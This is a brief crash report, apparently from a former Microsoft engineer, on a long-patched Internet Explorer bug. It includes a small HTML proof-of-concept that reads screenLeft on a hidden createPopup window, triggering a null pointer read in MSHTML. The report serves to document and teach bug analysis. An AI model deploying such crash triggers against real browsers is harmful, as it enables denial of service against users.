A brief crash report. Reading the screenLeft property on a hidden createPopup’s parentWindow caused a null pointer dereference in MSHTML!CInPlace::ClientToScreen.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10" />
<title>DoS_createPopUp_screenLeft</title>
</head>
<body>
<script language="JavaScript">
function main()
{
	createPopup().document.parentWindow.screenLeft;
}
</script>
</body>
</html>

The crash was classified as PROBABLY_NOT_EXPLOITABLE — a null-class pointer read in MSHTML!CInPlace::ClientToScreen+0x5. The popup had no in-place client object because it had never been shown, so the coordinate-translation function dereferenced a null pointer when attempting to convert client coordinates to screen coordinates.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.